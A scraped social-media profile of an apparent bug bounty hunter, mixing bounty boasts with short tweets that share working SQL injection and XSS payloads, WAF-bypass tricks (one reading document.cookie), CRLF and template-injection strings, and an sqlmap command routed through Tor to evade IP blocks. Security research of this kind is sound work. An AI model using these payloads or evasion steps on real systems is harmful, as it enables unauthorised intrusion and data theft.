Lu3ky13 ⚡️⚡️ Profile Banner
Lu3ky13 ⚡️⚡️ Profile
Lu3ky13 ⚡️⚡️

@lu3ky13

Followers
10,269
Following
731
Media
389
Statuses
1,563

ṙ̷̐̊̉̈͒̓̒̈́̐̀̓̅̂̈́̎́̉̋͌̚̚̕Security Researcher And Security Developer #CAPen #CAP #ewpt #ccna #CCSP -AWS #eCPPT CEO @CyberShield01 ⚡️⚡

kurdistan
Joined December 2019
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@lu3ky13
Lu3ky13 ⚡️⚡️
11 months
2023, 2022 top 10 injections and XSS Highest Reputation top 17 Oct-Dec 2022 2023 top 23 #bugbounty #hackerone @hackerone
Tweet media one
Tweet media two
Tweet media three
Tweet media four
6
6
103
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
Add to your list #SQL #injection payload #BugBounty 1%27/**/%256fR/**/50%2521%253D22%253B%2523 == "0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z", === query=login&username=rrr';SELECT PG_SLEEP(5)--&password=rr&submit=Login == ' AND (SELECT 8871 FROM (SELECT(SLEEP(5)))uZxz)
30
260
789
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
SQL Injection 11 hours 2 SQL Injection #sqlinjection #bugbountytips #BugBounty
Tweet media one
17
67
563
@lu3ky13
Lu3ky13 ⚡️⚡️
7 months
Bypass XSS WAF and Filters and Akamai src,svg,autofocus,iframe,img,<> all blok use this payload add to your list %22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22 #BugBounty #bugbountytip @safin_mohammed_
Tweet media one
Tweet media two
Tweet media three
9
153
561
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
6000$ increase to 7 or 8000$ this program paid me 6k, which increased to 7 or 8k after I found SQL injection, XSS, csrf, RCE I just used two tools, I will share them soon, manual testing, for the finding parameters I used two tools coming soon #bugbountytips #bugbounty
Tweet media one
15
50
494
@lu3ky13
Lu3ky13 ⚡️⚡️
4 months
[SQL Injection] GET /0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z/Folder/ HTTP/1.1 do you want to learn how? Visit our website #bugbounty #bugbountytip
Tweet media one
7
83
442
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
how I found XSS AND SQL INJECTION 1 I found text.php 2 I used Arjun to find parameters 3 text.Php?m=1'xss and SQL done, I submitted to h1 #bugbounty #hackerone #bugbountytips
Tweet media one
17
97
410
@lu3ky13
Lu3ky13 ⚡️⚡️
19 days
Sql Injection Payload : -10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z #bugbountytips #BugBounty #SqlInjection
Tweet media one
6
60
418
@lu3ky13
Lu3ky13 ⚡️⚡️
2 months
SQL Injection After this, I used ghauri to extract the database It was successful -11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)-- #sqlinjection #ghauri #bugbounty #bugbountytips
Tweet media one
9
68
393
@lu3ky13
Lu3ky13 ⚡️⚡️
8 months
After more than three hours we were able to bypass this xss with @Arez_1110 payload #"></div><a href= javascript:alert(document.domain) #bugbounty #bugbountytip #hackerone
Tweet media one
8
58
334
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
I found 255 to 300 Bug in one subdomin The programs paid me 5 digit B RCE sql ATO all other type of bugs The program responded once a month, paying $3,700 each month I found this all in one month and now I've been receiving that money every month for a year 😬 #bugbountytips
14
23
310
@lu3ky13
Lu3ky13 ⚡️⚡️
5 months
I sent more than 20 #SQL #injections to one program, do you know how? - - - - - - - - Only using the Arjun tool by @s0md3v #bugbounty #bugbountytip
Tweet media one
18
28
287
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
what I hacked? find here #bugbounty #bugbountytip
Tweet media one
10
15
256
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
We currently have 1,600,000 domains and subdomains on 5 vps We have also run this command in two ways It waybacks the whole list one by one and then runs the nuclei Second subdomains list+wayback+sqlmap+ You can send billions of requests with @Arez_1110 #bugbountytips #bugbount
Tweet media one
9
63
258
@lu3ky13
Lu3ky13 ⚡️⚡️
5 months
11000 reputation on @Hacker0x01 11k 💪 i submitted 30 bug in two days ✌️ wait for moe #bugbountytips #bugbounty
Tweet media one
17
6
245
@lu3ky13
Lu3ky13 ⚡️⚡️
7 months
Yay, I was awarded a $7,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder
Tweet media one
14
2
250
@lu3ky13
Lu3ky13 ⚡️⚡️
2 months
Old Report 2000$ PHPINFO 🫡 🧐 yes phpinfo 2k #bugbountytips #bugbountytip #bugbounty
Tweet media one
15
12
247
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
Database pwned 1:- I used dirsearch to find README+md file 2:- I opened README md I found "host=localhost dbname=ttt user=ttt pass=ttt" 3:- I used DirBuster to find PHPMyAdmin or Adminer 4:- done #sqlinjection #bugbountytips #BugBounty #PHPMyAdmin #Adminer #HackerOne
Tweet media one
11
50
242
@lu3ky13
Lu3ky13 ⚡️⚡️
4 months
[CRLF Injection] payload %0D%0ASomeCustomInjectedHeader:%20injected_by_fffffff #bugbountytip #bugbounty
Tweet media one
7
44
242
@lu3ky13
Lu3ky13 ⚡️⚡️
5 months
Yay, I was awarded a $3,500 bounty on @Hacker0x01 ! #TogetherWeHitHarder
Tweet media one
20
5
234
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
# Authorization-Nuclei-Templates 1000$ I got these templates from Google and edited them later with help web archive and subdomin scanner I was able to find bugs twice on two private programs #hackerone #bugbounty #Authorization #Nuclei #bugbountytips
13
69
236
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
bypass blocking IP, in sqlmap, i found SQL injection in normal scan my IP was blocked I used tor to send a request and I bypassed this issue sqlmap -r 1 --time-sec=10 --tor --tor-type=SOCKS5 --check-tor if not work change time-sec or use proxy list #bugbounty #bugbountytips
5
71
228
@lu3ky13
Lu3ky13 ⚡️⚡️
11 months
for me unlimited :D 🫡
Tweet media one
10
9
211
@lu3ky13
Lu3ky13 ⚡️⚡️
3 years
I submitted XSS and access admin panel to Apple on 10/2020 no bounty no response it's fixed #TogetherWeHitHarder #bugbountytips #hack #bug #security #bugcrowd #bugbounty #infosec #hackerone
27
23
196
@lu3ky13
Lu3ky13 ⚡️⚡️
11 months
Host header attack on Reset Password Lead to Account takeover and Bypass Redirect on response body bypass Redirect Host header attack #bugbounty #hackerone #bugbountytips
Tweet media one
14
38
193
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
Yay, I was awarded a $2,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder Apache Log4j2 JNDI Remote Code Execution #hackerone #Apache #Log4j2 #JNDI #Remote #Code #Execution
Tweet media one
6
10
189
@lu3ky13
Lu3ky13 ⚡️⚡️
7 months
Client Side Template Injection to XSS Add to your List 🫡 {{a=toString().constructor.prototype;a.charAt=a.trim;$eval(%27a,alert(1),a%27)}} #bugbounty #bugbountytip
3
31
183
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
Yay, I was awarded a $3100 bounty on @Hacker0x01 ! #TogetherWeHitHarder the first time I submitted an xss like this ><script>alert(1)</script> I bypassed JSON response second, after the fixed bug, I found a bypass with its payload #BugBounty #bugtips
4
11
176
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
I wrote these two scripts for a private program to produce a bug. I succeeded and received more than $1,000 brute-force directory work-with-multithreading check url list via cookies and Authorization + #bugbountytips #bugbounty
4
68
168
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
bypass cloudflare XSS <svg onload=prompt%26%23x000000028;document.domain)> <svg onload=%0Aalert1> <svg onload=alert%26%230000000040"1")> %2sscript%2ualert()%2s/script%2u <svg on onload=(alert)(document.domain)> <svg onload=alert%26%230000000040"")> #bugbounty #bugbountytips #bug
1
42
164
@lu3ky13
Lu3ky13 ⚡️⚡️
7 months
Yay, I was awarded a $3,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder
Tweet media one
7
4
159
@lu3ky13
Lu3ky13 ⚡️⚡️
9 months
SQL injection ASP by Ibrahim Husić Payload: `';%20waitfor%20delay%20'0:0:6'%20--%20` #bugbountytips #BugBounty
1
39
162
@lu3ky13
Lu3ky13 ⚡️⚡️
1 month
I used Burp Bounty Pro and Burp scanner and manually couldn't bypass this xss but I used @KN0X55 it bypassed. this is not ads for KNOX but it's very cool I like supporting this man #BugBounty #hackerone #BugBounty
Tweet media one
7
9
157
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
Yay, I was awarded a $3,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder RCE-log4jrce CVE-2021-44228
Tweet media one
2
5
143
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
Fixed today 😁 #log4jrce
Tweet media one
2
1
139
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
Happy to cross 5000 reputation points today, I was awarded more than 22 Triaged. and bounty I submitted SQL injection,XSS.csrf.clickjacking, ATO, RCE The program paid me $10,000 #hackerone @Hacker0x01 #BugBounty #bugbountytips
Tweet media one
Tweet media two
10
11
139
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
Yay,i got this month $10.000 bounty on @Hacker0x01 ! #TogetherWeHitHarder
Tweet media one
2
4
136
@lu3ky13
Lu3ky13 ⚡️⚡️
3 months
Yay, I was awarded a $1,500 bounty on @Hacker0x01 ! Account Takover via reset password 😁 I wrote a Python script for the attack #TogetherWeHitHarder
9
6
136
@lu3ky13
Lu3ky13 ⚡️⚡️
9 months
How this tool work? 1) Enumeration all target subdomain. 2) All subdomain test with httpx to find live domain. 3) All subdomain tested one by one with nuclei to find a vulnerability. 4 in comment #bug #bugbountytips #BugBounty
Tweet media one
7
37
136
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
1/1 Bypass Authorization Login into the Admin panel 1 download appe.exe and install it for windows 2 capture requests i used fiddler 3 update your profile the app sends a request to the server via the admin account i don't know why #bugbountytips #BugBounty
Tweet media one
5
44
134
@lu3ky13
Lu3ky13 ⚡️⚡️
4 months
200$ for re-test Critical BUG #bugbounty
Tweet media one
6
4
132
@lu3ky13
Lu3ky13 ⚡️⚡️
17 days
Send a report every day. If you can't send a report, don't sleep #bugbounty #bugbountytip
18
13
131
@lu3ky13
Lu3ky13 ⚡️⚡️
4 months
Do I have the skills for a #CTF ?” We have several different types of CTF you can try yourself Web Exploitation (WebSec) , Binary Exploitation (Pwn) , Cryptography (Crypto) , Reverse Engineering (Reversing) , Forensics , Mobile Security (Mobile) url:
Tweet media one
0
27
121
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
It's a very good program He quickly gave me a $4,300 bounty ATO + html injection If the website sends a request via GET username and password , directly search for another user and pass in web archive #bugbounty #bugbountytips #bb #hackerone
Tweet media one
3
8
119
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
I have found Local File Inclusion (LFI) in this PHP 1 first I found PHP files 2 I found the params 3 download. php?file=../. <?php $filename = basename($_GET['file']); // Specify file path. $path = ''; // '/uplods/' $download_file = $path.$filename; #BugBounty #bugbountytip
1
38
116
@lu3ky13
Lu3ky13 ⚡️⚡️
3 months
Hello dear Jober please can you send an update to this report 4 months have been resolved no one has responded @jobertabma report id : #2263294
Tweet media one
5
5
119
@lu3ky13
Lu3ky13 ⚡️⚡️
3 years
Yay, I was awarded a $$$ bounty on @Hacker0x01 ! #TogetherWeHitHarder
Tweet media one
4
5
114
@lu3ky13
Lu3ky13 ⚡️⚡️
9 months
#TogetherWeHitHarder I was awarded a $2000 bounty on @Hacker0x01 I've reported 50 bugs and only got paid for 3 bugs yet #hackerone #bugbounty
Tweet media one
Tweet media two
Tweet media three
Tweet media four
4
3
107
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
if you don't have a computer you can use these tools for recon in your mobile link bot: #bugbounty #bugbunnychallege #bugbountyhunter
Tweet media one
2
31
105
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
#bugbounty to #cryptocurrency I earned money in bug bounty I lose in cryptocurrency :D ahaha
Tweet media one
9
2
103
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
Spider X , XSScanner , Subdomain scanner daily i found RXSS and used @novasecio thank you @0xblackbird #bugbounty #bugbountytips
Tweet media one
Tweet media two
Tweet media three
6
21
105
@lu3ky13
Lu3ky13 ⚡️⚡️
3 years
Tweet media one
5
4
103
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
bypass two-factor authentication in Android apps and web 1000$ TikTok thank you for #zug #s3c #bugbountytips #BugBounty #bugbountywriteup
6
26
105
@lu3ky13
Lu3ky13 ⚡️⚡️
8 months
Web Application Penetration Tester &
Tweet media one
5
5
100
@lu3ky13
Lu3ky13 ⚡️⚡️
11 days
I hacked Cloud Computer Hackerone Triager 🧐 I got access to Cloud Computer Hackerone Triager #hackerone @hackerone #bugbountytips #bugbountytip
Tweet media one
6
14
119
@lu3ky13
Lu3ky13 ⚡️⚡️
7 months
10k reputation on @Hacker0x01 ! Keeping the Internet safe 👊 🫡 #BugBounty #HackForGood #togetherwehitharder
Tweet media one
8
1
104
@lu3ky13
Lu3ky13 ⚡️⚡️
5 months
bypassed Akamai with <script> 😂 Nice Xss #BugBounty #bugbountytips #xss #akamai
Tweet media one
4
4
98
@lu3ky13
Lu3ky13 ⚡️⚡️
9 months
For those who are new to bug bounty, you can use this tool It makes it easy for you. We have combined most of the tools into one tool #bugbounty #bugbountytips
Tweet media one
3
19
97
@lu3ky13
Lu3ky13 ⚡️⚡️
5 months
Nice XSS payload By @KN0X55
Tweet media one
3
8
92
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
Access to SSH password and MongoDB database I used this it's very cool thank you @mikey96_bh
Tweet media one
@mikey96_bh
Mikey
1 year
If you have a bounty program you like hacking on then try out the - we will return any data on the subdomains/services we have indexed and if we don't have the data we will go out and fetch it for you with an email notification when done.
Tweet media one
Tweet media two
Tweet media three
4
85
294
2
11
90
@lu3ky13
Lu3ky13 ⚡️⚡️
2 months
thank you @__mohammed_a_ @KN0X55 API to find xss This is very nice and working good #bugbounty #bugbountytips
Tweet media one
7
8
91
@lu3ky13
Lu3ky13 ⚡️⚡️
5 months
Open to collaborate Is there any way to bypass [06:51:19] [WARNING] invalid character detected, retrying. @zseano @_xploiterr @nav1n0x @GodfatherOrwa thank you
Tweet media one
Tweet media two
15
5
88
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
after I submitted (Server-side template injection) and i got a duplicate 1000$ I lost it Then I was upset after that, I spend 2 days and found a ton of bug Bypass Authorization Login into Admin panel Server-side template injection -4- RXSS -5- Sql Injection -3-3 #BugBounty
5
5
83
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read! #BugBounty #bugbountytips #bugbountywriteup
1
20
85
@lu3ky13
Lu3ky13 ⚡️⚡️
3 years
Tweet media one
1
1
84
@lu3ky13
Lu3ky13 ⚡️⚡️
6 months
I reached the 10000 Reputation Milestone and thought they would send me a plane of swag I had told all my friends to be present that day because there were so many swags I couldn't carry #hackerone
Tweet media one
3
0
82
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
use this bot in a telegram to find a subdomain if you don't have a computer you can use this bot #bugbountytips #BugBounty #hackerone #bugs
2
18
81
@lu3ky13
Lu3ky13 ⚡️⚡️
12 days
Never expect someone to tell you the secret of their recon method #bugbountytips
4
1
82
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
every week #High and #Critical #RCE BYPASS login SQL injection #ATO
Tweet media one
Tweet media two
Tweet media three
4
5
75
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
Tweet media one
2
20
76
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
Tweet media one
5
0
73
@lu3ky13
Lu3ky13 ⚡️⚡️
7 months
new version coming soon, In this version you will be able to enumeration subdomains by using a list of domains or single domains, and more all in one #bugbounty #bugbountytip #hackerone
Tweet media one
2
19
76
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
a ton of reward :D 12 reward #bugbounty #hackerone
Tweet media one
3
0
75
@lu3ky13
Lu3ky13 ⚡️⚡️
9 months
On 30/08/2023 a new scope was added to the program I reported 14 bugs, sql injection, XSS, and on 31/08/2023 The program was closed [Out of scope] #bugbounty #hackerone
Tweet media one
3
2
73
@lu3ky13
Lu3ky13 ⚡️⚡️
2 years
3G log file 30M line After finding the log file I was able to find 10 bugs SQL injection and XSS It's still going on #bugbounty #hackerone #bugbountytips
Tweet media one
3
10
70
@lu3ky13
Lu3ky13 ⚡️⚡️
1 year
Tweet media one
4
1
68
@lu3ky13
Lu3ky13 ⚡️⚡️
9 months
Tweet media one
2
0
71